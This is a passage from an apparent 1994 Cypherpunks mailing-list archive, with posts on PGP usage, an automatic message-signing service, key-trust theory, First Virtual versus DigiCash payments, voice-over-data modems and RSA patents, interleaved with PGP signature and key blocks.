auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuCI6SoZzwIn1bdtAQGzsAF/bDaj0dXzETyOkhL+qN+EfJYumWR6Oocj m4drVaoXQBnuEmQMM4UfOwcTt6tqsr/a =saEy -----END PGP SIGNATURE----- From snyderra at dunx1.ocs.drexel.edu Sat Dec 3 07:37:25 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Sat, 3 Dec 94 07:37:25 PST Subject: How do *I* use PGP? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 5:30 PM 12/1/94, TheElusiveMatthew wrote: >It has been my belief that there isn't an effective way for me to use PGP, >but with all the hubbub, I thought it might be worthwhile to verify this. > >My internet access is through a personal account provided by my employer. >It is on a machine used exclusively by employees of the University of >Illinois (no student accounts). What kind of machine is it? How do you read mail? A PC mail reader? >My primary access to this account is through my IBM xt (dos 3.3) at work. >This machine is occasionally used by others and is outside of my control. >I also use many of the public access Win/Mac machines on campus. >I have no pc of my very own. The XT might be difficult because of memory issues, but there are versions of PGP for UNIX, Mac, and PC, sp..... Bob -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLuCM/OS0CjsjWS0VAQGUCAQAngYMNWJsk0ZpZfKS54JBcyND9HswtoIt 2U9a9pzDkSFxUyUYNvBRPzvaabjRtG6wBhaS/t7in7rxFCQ9TEPYha4pu6SXRXM6 XclYnCw/9zHJRCtRHMHAT0ijYvQvqPirDcQS7TzhRUfEbXAI1A6VN2X3OVGIyU14 pwZb72SgNh4= =j2U3 -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From eric at remailer.net Sat Dec 3 08:58:16 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 08:58:16 PST Subject: First Virtual? In-Reply-To: <9412022231.AA06560@ch1d157nwk> Message-ID: <199412031756.JAA17333@largo.remailer.net> How can you really compare the proposed DigiCash systems versus FirstVirtual? One is a 'toy' system for moving credit card numbers around without actually broadcasting them in the clear, the other is a cryptographically secure digital cash type system. Digicash and First Virtual and Net Bank are all payment systems. The primary benefit is moving money. _All_ other benefits are secondary, including privacy and security. As far as actually being a payment system, it's Digicash's trial which is the toy system. It can't move money. First Virtual, no matter what its flaws, can. Not particularly securely, not quickly, but money will move. Just because FV is a bad payments system doesn't mean it's not a payments system. There's no question at all that Digicash's technical means are superior to First Virtual's. But technical means alone do not make a business and Digicash at this moment doesn't have a business but rather only a possible opportunity for one. First Virtual has all sorts of problems. Its security sucks. It will have a higher fraud rate than other credit card uses. Merchants won't particularly like it because of this and the delay in payments. Users won't like it because the interface sucks. It's not fully fungible money, because you can't use it for arbitrary commmerce. Fine. Because of all these concerns, FV won't be suitable for many purposes, but it will be for some. What FV's commercial advantage will be is that they'll have a pre-existing user base on hand when the improved system comes. This is a not insignificant advantage, since it's much easier to deal with someone you've already been dealing with than with somebody new. Eric From pfarrell at netcom.com Sat Dec 3 09:01:43 1994 From: pfarrell at netcom.com (pfarrell at netcom.com) Date: Sat, 3 Dec 94 09:01:43 PST Subject: Cypherpunks@hks.net service Message-ID: <199412031706.MAA07494@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- >> It will sign any message sent to cypherpunks at hks.net with its >> (currently 384 bit) key and forward the signed message to >> cypherpunks at toad.com. > > No offense, but what's the point? What's next, automated key-signing The point is that if Eric insists on arbitrary rules that threaten the list, some bright c'punk will "write code" to circumvent the assinine rule. Use technology to solve problems... But that is why a number of folks have posted that the rule is at best ill conceived. Eric simply hasn't listented. Thus the recent mini-flame war that again lowers the signal to noise ratio on the list. He wants the world to use encryption. So do I. But the tools are not there for even the net-heads on this list. There is nothing close to tools suitable for Joe Sixpack. Changing the rules on c'punks won't change that. Pat Pat Farrell Grad Student pfarrell at cs.gmu.edu Department of Computer Science George Mason University, Fairfax, VA Public key availble via finger #include - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuCljioZzwIn1bdtAQEjewF+N4i7B7kdkeGyi+ggI4PjQAbQ6Uyl+45i mqbyWWGDptWY/nsZOmLmBnX8T64U1JuH =e2n2 -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 3 09:02:37 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 09:02:37 PST Subject: signature checking at the server In-Reply-To: <199412022104.NAA17526@jobe.shell.portal.com> Message-ID: <199412031801.KAA17339@largo.remailer.net> Unbelievably, I don't think this old canard has come up yet in this discussion. I've always perceived PGP(Tm) as something I would use when I really had something sensitive to send a friend, If you encrypt only some messages and not others, every use of encryption will indicate that something significant is going on, which is a first class message of its own. Only if all messages to particular correspondents are encrypted do you reveal no information about importance. Encryption still has benefit here, but the argument that it should only be used when important has no merit. Eric From eric at remailer.net Sat Dec 3 09:14:35 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 09:14:35 PST Subject: MIT Keysigner CA In-Reply-To: Message-ID: <199412031813.KAA17366@largo.remailer.net> From: Christian Odhner I trust a key to be an introducer if and when I am sure that a signature by that key means that the signed key belongs to the identity (be it "real" or a 'nym) it claims to represent. There is a qualitative difference between a real identity and a pseudonym identity. A real identity has a body attached to it and a pseudonym identity does not. The phrase "belongs to" cannot be used in the same sense for both of these, and the failure to discriminate between them is a fallacy. With a pseudonym, the identity _is_ the key. All you need to do is to ensure that the pattern of bits in the key does not change during distribution. As far as an MIT autosigner, the signature will simply represent a reduction to the trustability of the MIT account assignment procedure. This is not a reduction to bodily identity and should not be construed as such. In fact, a MIT autosigner is exactly what I was talking about when I advocated that communication provider sign keys. (Good work as usual, Derek.) The signature here represents an attestation that a given key (that is, a given identity) can be reached through a particular mailbox. Almost all email is effectively pseudonymous already, even if there is a shadow of the procession of bodies behind the email. It makes good sense to speak of mailing to a key; this is the logical operation of creating an informational space accessible only to the holder of a secret. A mailbox is merely a physical and technical means for reaching that space. Eric From eric at remailer.net Sat Dec 3 09:35:12 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 09:35:12 PST Subject: Disclaimer within signed body? In-Reply-To: <199412022016.PAA16908@bb.hks.net> Message-ID: <199412031833.KAA17387@largo.remailer.net> Todd's autosigner raises some good issues about what signatures can actually represent. Todd's service takes an incoming message, attaches a note about technical means and also a signature. As Todd points out, this signature represents the fact that a message destined for the cypherpunks list passed through his server. But Todd also wants the signature to attest to the disclaimer attached to the mail. The signature, therefore must be affected by both segments of text, that is, the disclaimer must be inside the signature. There is also, however a desideratum that the original message be preserved to the greatest degree possible. Since two text segments must go inside the sig block, there must be a packaging syntax to represent a two part message composed of the original message and the disclaimer. There is already a syntax which accomplishes this for email--MIME. I'm not going to get the syntax of this example right. ----------------------------------------------------------------------------- --- Begin signed message --- :: Content-Type: multipart/mixed Content-Length: [...] Boundary: === Content-Type: text/ascii === === Content-Type: text/ascii disclaimer === === --- Begin signature --- a;sdfj;alsdjf;a lsjas;ldkfj;asjdf;askjdf;laskjdfdf a;sdfj;asdjf;asfj;alsjdf;aljdf;alsdjf;alsjdf;asjdf --- End signed message --- ----------------------------------------------------------------------------- Now as far as aesthetics, this has got a lot of screenjunk in it. It does, however, represent exactly what is going on in a way that the right kind of MIME capable reader can make exact use of. I'm not advocating this. I do think, though, that a minimal solution to all the criteria at once looks a lot like this. Eric From jya at pipeline.com Sat Dec 3 09:42:01 1994 From: jya at pipeline.com (jya at pipeline.com) Date: Sat, 3 Dec 94 09:42:01 PST Subject: First Virtual? Message-ID: <199412031747.MAA07819@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Responding to msg by eric at remailer.net (Eric Hughes) on Sat, 3 Dec 9:56 AM Not a big deal, but for Unix-fans who deign toy-PCs, PC Mag of December 20 has two brief pieces on First Virtual, indicating that its mass-market greenbucks are abuying hard pitch Xmas-adcopy. One dim-spots other "digital buck" services SpyGlass and Open Market, cash-poor things. See pp. 32 and 61. [First time use of the sig below, be gentle, still learning how to get PGP-signed message in this mailer.] - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy6rxQQAAAEEANW657bMcILCSaEYHV46DQWojtHDv6UQ2qGz+6wG5g5Q7KMz QkQjM+fYNScW4fDUYH02wLG5x/E5hYwSaYal0k0b6G9m921QKqhVYj2+QzfiMqce N45t4GjSNBdwmNywZEyz5RKXbAWm78DmAt9Ro3M8AGvG1XrsU4Sb9hQ07hCVAAUR tB1Kb2huIFlvdW5nIDxqeWFAcGlwZWxpbmUuY29tPg== =F0Xj - -----END PGP PUBLIC KEY BLOCK----- - ------------------- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuCvBioZzwIn1bdtAQGKqgGAnUpbIyAQ4aE1d0iHHZQLpj8yn2jRHruS oK8hqFI8AI07p0pMGl7kcgm1OefM/zOy =aTQt -----END PGP SIGNATURE----- From kafka at desert.xs4all.nl Sat Dec 3 09:58:24 1994 From: kafka at desert.xs4all.nl (John van Goorkom) Date: Sat, 3 Dec 94 09:58:24 PST Subject: Voice over data In-Reply-To: Message-ID: <199412031759.AA02827@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- rishab at dxm.ernet.in once said: RI> Eric Hughes wrote: RI> > the great voice-over-data protocols and products introduced by RI> > Intel, Rockwell, ZyXEL and others at Comdex which will make RI> > Voice-PGP so much easier RI> > RI> > As I understand these voice-over-data products, the voice goes over RI> > analog, added to the modem signal. The modem signal is interpreted, RI> > and then reconstructed and subtracted from the incoming signal, RI> > leaving voice. Very clever, but insufficient for secure phones. RI> RI> I don't think that's how they do it. As far as I know, most methods RI> multiplex RI> digitized audio with the data. One system used by some people in India RI> provides RI> a dynamic combination of fax, (digitized) voice and data, depending on the RI> throughput - eg vox/9.6 data if 14.4kbps, fax as well if 19.2, etc. RI> RI> While Intel and others are proposing standards, ZyXEL does it with software RI> along with a voice card or possibly RJ11 input. A friend of mine saw a demo RI> of it at Comdex, on an old 1496E (16.8 kbps zyxel to zyxel). The new v.34 RI> does RI> 28.8k - lots of room for clear digitized voice and high speed data. RI> RI> This is exactly why I thought it would make secure voice easier, if not RI> secure RI> phones (who wants to lug a modem and PC around as a 'handset'?). RI> RI> I'll be testing some Onetics Rad VFAST modems this week, which apparently do RI> digitized voice over v.34 as well. > >You wouldn't have the directory name as well, by any chance?, David. The IGP files are available at a32.cc.umist.ac.uk in the /network/ftp/igp directory. There are two versions of the program available: 1. igp8_10x.zip for 8 bit sound (on 8 or 16 bit sound cards) 2. ig16_10x.zip for 16 bit sound cards. Better quality, but more data to transfer so a bit slower. the latest source code is also available as igps_10x.zip. Paul Archard (IGP UMIST Distribution acting Project Manager) _______________________________________________________________________________ kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkno, SL-1200 Kafka's home page _______________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLt7CDZRymF15lPcFAQFSsgIAhoPpWCNjRbmqu9hxrrzSKbf7uMqeJxAd /B24tG5b5Cn3a478sg3OrMUjgF9CbsS7FZZEtKL8beOcsxS/5oaoEw== =jMOd -----END PGP SIGNATURE----- From desert!desert!kafka at consolat.xs4all.nl Sat Dec 3 09:58:47 1994 From: desert!desert!kafka at consolat.xs4all.nl (desert!desert!kafka at consolat.xs4all.nl) Date: Sat, 3 Dec 94 09:58:47 PST Subject: my key Message-ID: <199412031803.NAA07972@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6whatever mQCNAiz8ExIAAAEEAMCOBYWuMLd+bWGzyLIO2Nr+jQOydZ3azOVkRtsz0sgaRmep UoMcAdpfAdDp3QzyQ5yzYfw5xqcFqiTJDaSNd0vncAHpsA2gQl727B1blg4qVlDY 5mNlJUG6CVrAq11eqI0pYIfw/uNlysvt/qKIEh4lK4ShLhBaab5mNggyLQMFAAUR tB9LYWZrYSA8a2Fma2FAeHM0YWxsLmhhY2t0aWMubmw+iQCVAgUQLnyB6lnfdBSN VpE9AQGB1QQAqQcj/2Vzml1gb9QsYsfRa9cQYMIn9xlOYcABtkIFiNoVfKnPu8s+ d+RMWCzpFcLjMVVFsS54RyBYF8tQ80ffWJWITQS0MPS8ucZn/RHjht4ZYu81NpY9 V1mG98Enm9HeFNSxcid5Q7VIP17AEUMzSqG3GLMcWKrHz/fBq4UGevG0H0thZmth IDxrYWZrYUBkZXNlcnQuaGFja3RpYy5ubD6JAJUCBRAtWR9SBN4BepzgcqkBAUfx A/4opPXbFsoGg/qvqmQACKXJcVTu0SCYRJlnT10fs8k57Qpz01E7gWqLprJ74JBW Pi9hjPih2AleNVEIiATQC/VFSI1IR293lX3+1UM+ET/D8EZsRlpQqiPw1//GLxAt X8tKjgMI292jyg3rtzcJ1dvlP+9PFX/yNLrHJ39UhrfWbokAdQIFEC3JH5a/Fnjq Veer/QEB7qcC/3DcCtqXAyVVEs5mmrq/aFTgBatg68iU7tLsz1882G2y2avoZla5 WlTVXaSTZhmA9PK+4vbsxOW9TG1avwZDVTKIl7ibQL0z04WOyBYaH1PxLcbjKwUm c2P/Cb8bVO889okAVQIFEC3JH386SFmmUgayqQEBIyEB/il0p2+45H8dFIqiaTt2 1AQP7gzJFzVBeU3McoHFrJMY6IH97jWpwGUICq136kn+8Ry5anW5I4ZmWRO6nmm5 TFuJAFUCBRAttLsHlHKYXXmU9wUBAYc5Af9eXImYLf3OfwvAFXLqFh1LLA3lBqM2 j1BBYibphrCZPq99Bm29ntwm3yfMFKobsNP5tOX6t9RbULo3qMnfyvrZiQCVAgUQ LbSdrFnfdBSNVpE9AQE0awP/Yr3tJmdwBTuHYEr0Jf2YMclLXkkFT1Q1XFim1UZK rDNeJhPJE0ppHR0Qqbmr7GIsLNjU1ThCcS0RnoHA7XA5GkeIO8M+EI4EUFWcxnJq aNKWASZZ0WY4WeLEWgNkYvi2kZ853nvszzIl5mSRu7iZN+CWO3NZEsVeCCeWtkgM EEeJAJUCBRAtsmhKvmY2CDItAwUBAca7BACO6MWkKbkzGpMVXpU8YckWeejod6rw YsWP72/eFxSLj/Hm2bwXvxsrMHbli1h0Vg1qUwXoqjoGFtXsdyTRubBvYNjZWlV7 +c/iKs0nTZjXRd3WINMcxoxNj8ocg+gBgMkkC4sH7bMPFbX1C3mw22l3K7qGnndL gfdRuYe00Vr2gokAlQIFEC2nH78Hrbnp9ffk/QEBmQgD/RmiG3wvn1N6AIQgGZvW mhbStQ6S5ak6wBODMMxcvtoiAwpQ6fMZ8SNFRte33IglC54GCA6Rr1eF+dzLMJ5j PUVph5DkW/bWP/TuY7L8aZFM7M09dN01eqFCRxhNSKWI8yiF6vDigE/Po/INlJB5 JKTjx9TUuyiN/eX8ixJ0eTC+ =io0v - -----END PGP PUBLIC KEY BLOCK----- _______________________________________________________________________________ kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkno, SL-1200 Kafka's home page _______________________________________________________________________________ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuCy7CoZzwIn1bdtAQGPVQF7BdmQzFQCE3GvRiFWRrfwB10Bwvh9XxEc tKwWorCuX8qmUd8VyajqgHLITJRqPyig =1wO5 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sat Dec 3 10:18:26 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Sat, 3 Dec 94 10:18:26 PST Subject: Info about Linux Message-ID: <199412031823.NAA08121@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Michael D. Crawford writes: > You can get Linux books and CDROM's from the Computer Literacy bookstore on > North First Street in San Jose, and Powell's technical books in Portland > Oregon. Powell's does mail order, and has a Web page which allows you to > search their inventory for books. They've got lots of crypto books too, > 2600 Magazine and lots of engineering books. I think the URL is > http:technical.powells.portland.or.us. Computer Literacy also claims to ship worldwide, and offers an Internet address (unverified): info at clbooks.com - - -L. McCarthy, merely a satisfied patron of Computer Literacy Bookshops Inc. - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuC2Ymf7YYibNzjpAQHImAQAtjVRIC/P7DbvHc7+Umi/b4dxtpkw64M+ eCBy62nmOhQuKv7H6DXHCi00+648qui2pCV1f9WN8om1Iv9pf7cCjg5QHdNLd5U/ obJrWmrB/XcJq+LzJoqlBQLkw5pxt1mGEBeoeG+bHZAXpeW7AvbH9LRek2k3lagF l544vUc+QPI= =XKzG - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuC3jSoZzwIn1bdtAQEwegF9FDvDahwOWnh0pMJxK1OimynvSHsGWOp8 Bm23ZGqRyvGkPDVR/BscmfQM55G1RmaJ =UYao -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sat Dec 3 10:37:07 1994 From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu) Date: Sat, 3 Dec 94 10:37:07 PST Subject: DETWEILER IS SPOOFING US!!! Message-ID: <199412031842.NAA08292@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Alan Bostick writes: > Thank you, Mr. Anonymous, your comedy has relieved a great deal of the > tension, at least here. If it weren't for LD's successful attacks on the remailer bramble, I might be able to derive some amusement from this. As it is, this stuff just makes my blood boil. If some government agency isn't sponsoring his antics, it certainly should be. I used to be surprisingly willing to keep an open mind and take LD's claims seriously; more than most non-paranoiacs, I think. He had a fair shot to gain my support. Instead, he's made yet another life-long enemy. I hope I'm making myself perfectly clear, LD. I don't despise you because Tim said so, or Eric said so, or because of your criticism of the list. I despise you as a direct result of your own deliberate actions. You've brought this upon yourself. Feel free to slither away now. - - -L. McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuC6dWf7YYibNzjpAQGWLwP/XAE5ZHwOByUrIqA2PbwbW9ZkMMdUMo3i eIIkJQnxOmDP3cp1Pr5eaMywyNACxCfBVs1jU5KXEp1XEcQmTD1ib6vXS28zAzlr SQhh2up2k4pNWr0uK/X6IHD3vVnUlbRkjk+fSE18/BhYRNaS7cELnMbFDQXsdtz/ KpAgGl4SM08= =R/UR - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuC72CoZzwIn1bdtAQH9fAF/deI6ep4aqGK+yraM2fF9qR5+kJ3yMpWu ALPJ/rTioGjezsYx6/y1cotR1gf4SV6B =Pdlu -----END PGP SIGNATURE----- From usura at vox.xs4all.nl Sat Dec 3 10:53:55 1994 From: usura at vox.xs4all.nl (Alex de Joode) Date: Sat, 3 Dec 94 10:53:55 PST Subject: Kudos Message-ID: -----BEGIN PGP SIGNED MESSAGE----- : -----BEGIN PGP SIGNED MESSAGE----- : : Thanks and congratulations to Todd for a job well done with the : CP signing service and Raph for his excellent work with premail. : : An appreciative lurker/learner : : : - --- : [This message has been signed by an auto-signing service. A valid signature : means only that it has been received at the address corresponding to the : signature and forwarded.] : : -----BEGIN PGP SIGNATURE----- : Version: 2.6.2 : Comment: Gratis auto-signing service : : iQBFAwUBLuA9wioZzwIn1bdtAQFXnwGAitqcooxfEeABifXLhmxmRAQKlM90Gm6K : Y2vmZi3kjSYWpDMYQNkID+HXYTeps30Q : =oN3X : -----END PGP SIGNATURE----- I did not write the above message; it was probably send using my remailer wich is installed at usura at xs4all.nl. Todd, could you let the software use the from line and not the sender/originator line, or whatever caused this error? From: usura at xs1.xs4all.nl Message-ID: <199412030943.EAA04190 at bb.hks.net> Thanks, -----BEGIN PGP SIGNATURE----- Version: 2.6.2. iQCVAgUBLuC64lnfdBSNVpE9AQGKVwQAlvNVdoFFYD3MLvyqOLQrTkd3hJBXqskf fVlX4ng9fJN5vL9B8BpaKQlg0z7uy9kywTkAmXMS/7cOe/IuVBsvmRt2hP1TVCwW i3LSSqZyg9arRFRpw2Yx77/RwWGQPyYRt7uD75YdBfrc152u7PKVIHouXNBTA2Uj YhayLgJ0pWE= =soLT -----END PGP SIGNATURE----- -- Exit! Stage Left. Alex de Joode From usura at vox.xs4all.nl Sat Dec 3 10:54:57 1994 From: usura at vox.xs4all.nl (Alex de Joode) Date: Sat, 3 Dec 94 10:54:57 PST Subject: ecash trial issues explained Message-ID: -----BEGIN PGP SIGNED MESSAGE----- bigmac at digicash.com (Marcel van der Peijl) writes: : : Last time I checked (a week ago, I am currently on the road) there : well over 500 or 600 active ecash accounts. But there are another : 1000 accounts waiting, and new requests coming in between 10 and 100 : per day. [..] : Because we can not support a 24 hour staff and we want : to keep response time low, people in time zones close to ours (GMT+1) : have been issued accounts first. At the moment we are confident we can : scale up the trial. I promise you it will not be several more months : before everyone can join the trial. There is a sort of (limited) Freenet system in Holland called DDS, people can request an account, (wich usually takes 48 hours), if youre - -really- want ECash fast, get an Dutch-English dictionary and type: telnet dds.nl EnJoY Alex -----BEGIN PGP SIGNATURE----- Version: 2.6.2. iQCVAgUBLuC8bVnfdBSNVpE9AQFneAQAr2hdWpmiK4jmw2c1NO/miL46OincgRpp KE39FZzCCx9z0+2EWiFj2i7v6A9zfzDk4OQ94fKCA/jypFMBv6fCf/Sar/4cymcf zU5PDgwyxQHBk9RPVMG2M0o1mMKEDINfq3amfpw2UQz99gqzzRhLsqmyk3Z2rM+E flDSfK5RIIE= =gd6r -----END PGP SIGNATURE----- -- Exit! Stage Left. Alex de Joode From turner at telecheck.com Sat Dec 3 10:57:48 1994 From: turner at telecheck.com (Joe Turner) Date: Sat, 3 Dec 94 10:57:48 PST Subject: PGP on a VAX In-Reply-To: <199412030109.UAA07622@phobos.lib.iup.edu> Message-ID: <9412031858.AA22953@TeleCheck.com> > > -----BEGIN PGP SIGNED MESSAGE----- > > I was wondering what the status of getting PGP compiled on a VAX was. > The academic machine here is a VAX 6540 running VMS 5.5-1. > Of course I avoid it, but I want to spread the good word amongst > the IUP student users. Any place I can get documentation? > > > - ----- > Doc "I used to think that my brain was the > rogaski at phobos.lib.iup.edu best part of my body ... but then I > http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." > 100,000 lemmings can't be wrong! - Emo Phillips > > finger fllevta at oak.grove.iup.edu for PGP Public Key > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLt/FJR0c4/pqJauBAQExfQP/Z1EhLyYw449tTTjYrNNlLRdLA9sA2V+o > rpYUgKc0o8yGfEVkERhMH5F40IawXfXkcmVp9Zk+AV8Z7GP2YYpIT8pbFuGSYAYZ > HuZXUmYgfmGkzM9uyxV82TyTjh9hQ4Hv7ijwWIPOeROV552WJZYzamJqeBfdi/80 > xR13UjkjZs4= > =CA+0 > -----END PGP SIGNATURE----- > According to Jeff at ViaCrypt, they have yet to start working on an "official" version of PGP on the VAX. However, if you get the source code you will no doubt see the MMS and VAX assembly language files (*.MAR). I attempted to get it to compile but couldn't. You are going to have to edit the files to add a few header files, even with the MMS file. I was toying with the idea of starting to work on a port to OpenVMS so it will run on an alpha, but there are some issues reguarding commercial usage that I'm somewhat leery of (I use this account almost soley as a personal account, yet the company pays for it...). I've even stopped using PGP several months ago for personal use until I can scrap up enough money for a real-live-registered-professional copy. Does anyone have any input as to ViaCrypts windows PGP application? Is this any good? If you need any help, send me e-mail I'll be happy to do this for you. I guess compiling code for someone else won't violate the license restrictions. -- Joe N. Turner Telecheck International turner at telecheck.com 5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659 compu$erv: 73301,1654 (800) 888-4922 * (713) 439-6597 From warlord at MIT.EDU Sat Dec 3 11:04:06 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sat, 3 Dec 94 11:04:06 PST Subject: pgp / passphrase / capture / yikes! In-Reply-To: <199412021900.LAA29951@jobe.shell.portal.com> Message-ID: <9412031903.AA07455@toxicwaste.media.mit.edu> > just wondering , if i use pgp on my pc , and lets say while on my unix > connection to the net i shell to dos to do encryption or decryption , does > this compromise my security in any way ? can some admin catch my > passphrase, i don think so , but i'm really fucken paranoid ! thanks for > any answers felloe punks ! If you are dialed-up to a UNIX box using some terminal emulator, say kermit, and you escape back to the local machine shell-escape to run PGP, the SysAdmin on the UNIX side should not be able to read what you say. -derek From owner-cypherpunks at hks.net Sat Dec 3 11:46:38 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Sat, 3 Dec 94 11:46:38 PST Subject: Kudos Message-ID: <199412031951.OAA08969@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Alex de Joode wrote: >I did not write the above message; it was probably send using my >remailer wich is installed at usura at xs4all.nl. > >Todd, could you let the software use the from line and not the >sender/originator line, or whatever caused this error? Actually, I've been using the "From " line in the UNIX mail file, as it's the "envelope" address. But that's because the system I built on top of was an infobot. I'll change it to just pass the "From: " header along from the input. Sorry 'bout that. -- Todd - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuDMNyoZzwIn1bdtAQFkTwGAo2NiQbARWrJHrbfFalQl+reXwgi7KAEK u7IJxm3aLxC+ZsYfDIo8DOupp/kPakLl =Av+q -----END PGP SIGNATURE----- From rishab at dxm.ernet.in Sat Dec 3 11:49:15 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 3 Dec 94 11:49:15 PST Subject: Netscape RSA Message-ID: Tim May wrote: > Also, Netscape the company (formerly Mosaic Communications) is seeking > to hire someone to [get it working with PGP]. Actually, Netscape is going to do something like S-Mosaic + S-HTTP (used in CommerceNet) - not PGP but built-in RSA digisigs and encryption (US only of course). ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Dec 3 11:49:15 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 3 Dec 94 11:49:15 PST Subject: GATT and RSA Message-ID: grendel at netaxs.com: > Anyone know how GATT would affect this, if passed? ABC News ran a > short blurb a few nights ago about how it contained intellectual property > provisions, and that patents would be honored worldwide. (?) What effect > would this have on the distribution of PGP, and other software that uses > RSAREF? GATT doesn't say that the world has to adopt US patent laws. It insists on the acceptance of certain categories of biotech and pharmaceutical patents, but not algorithms or software. Nor does registering a global patent become significantly easier - you still have to file (and pay for) patents in each country you want to 'work' it. Filing first in PCT (Patent Coorporation Treaty) signatories makes the process somewhat cheaper, that's all. So GATT is unlikely to affect RSA. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From alex at omaha.com Sat Dec 3 11:53:03 1994 From: alex at omaha.com (Alex Strasheim) Date: Sat, 3 Dec 94 11:53:03 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412031939.NAA01510@omaha.omaha.com> Message-ID: <199412031953.NAA01538@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- > The facts of the matter is that First Virtual currently provides a net > benefit by moving real value (e.g. dollars) around, and Digicash does > not. Until the Digicash system can move real value, there is no > reason to use it. I think I'm missing something here. Isn't the Digicash system in a beta-phase? At this point, aren't they just trying to work out the kinks and show people that it works? Obviously, a system that hasn't been deployed isn't as useful as one that has. The question is, once Digicash is released for real, how will it compare to FV? I don't have any Digicash software yet, but I'm very interested in it, and I wonder if anyone else feels that a Digicash beta testers mail list would be a good thing. I'd like to hear what you guys think of it. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuDMqxEpP7+baaPtAQFQ0gP+PZzEx6Z6fQiURXCUtnRnxeVZEVweZ4K3 fLRhvC8nizTdQKPqMQcGQzd/jRqV1zLiPuEKwTLTsz9onEqwaDF7t1sg5DCbqlXj KrYTfKXxOyCDY+knc2Bv72TxLcO0V2Rk07McgDfufLel+GUrdCXA4zHc/nTdktKV KgbF5+Nse/k= =WyDJ -----END PGP SIGNATURE----- From owner-cypherpunks at hks.net Sat Dec 3 11:55:47 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Sat, 3 Dec 94 11:55:47 PST Subject: Cypherpunks@hks.net service Message-ID: <199412032000.PAA09107@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412031706.MAA07494 at 